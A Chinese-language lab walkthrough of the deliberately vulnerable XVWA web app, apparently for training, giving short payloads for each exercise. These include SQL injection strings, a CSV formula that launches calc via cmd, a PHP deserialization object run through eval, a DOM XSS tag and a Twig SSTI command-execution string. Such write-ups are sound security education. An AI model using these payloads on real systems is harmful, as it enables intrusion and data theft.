首先修改config.php文件
在创建数据库,打开setup页面提交即可安装成功
安装完毕,直接给图
SQL Injection
看到源码中两个参数带进去查询了,都没有过滤,一个where语句,一个模糊查询语句
构造语句,爆出数据库
1' union select 1,2,3,database(),5,6,7#
还有一个参数item参数,我们抓包改下代码即可
-1 and updatexml(1,concat(0x7e,(database()),0x7e),1)#
SQL Injection-Blind
这关还是一样啊,不多说了,下一关
OS Command Injection
这里源码是想执行ping命令的,我们用windows的管道符执行我们的语句即可
XPATH Injection
用1' or '1'='1来执行我们的语句,遍历所有内容
源码中我们输入的值可以用单引号包裹前面在用我们的语句后面再包裹即可
CSV Formula Injection
在之前我们要先提交内容上去
在第三个内容处添加上1+cmd|' /C calc'!A0
把文件下载下来,打开之后会弹框点击是即可
PHP Object Injection
点击按钮会看到url中一些东西,那个就是序列化内容了
源码中可以看到把我们r参数反序列化之后用eval执行了,所有直接构造语句让它执行我们的代码
O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}
Unrestricted File Upload
这里直接上传php文件即可,下一关
XSS reflected
直接输出的,不多说
XSS Stored
这里防止了sql注入,但是没有防护xss
XSS DOM
<img src=1 οnerrοr=alert(/xss/)>
File inclusion
把要包含的文件写在file参数里即可,可越级
Session Flaws
登录之前和登录后session都是一样的,我们先退出登录
在未登录情况下抓包修改COOKIE参数即可
Insecure Direct Object Reference
可以看到只有五个选项可以选择
我们把url中的item参数改成6可以越权查看
Missing Functional Level Access Control
源码中有个删除功能,加上action参数我们是可控的,即把改变参数实现删除
我们发现更改密码后会出现在url中,我们让管理员访问这个url即可修改密码
Unvalidated Redirects and Forwards
检查元素发现有个url链接
我们更改下参数就会跳转到其他页面了
192.168.56.1/xvwa/vulnerabilities/redirect/redirect.php?forward=https://www.baidu.com
SSTI
我们可以输入
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
实现命令执行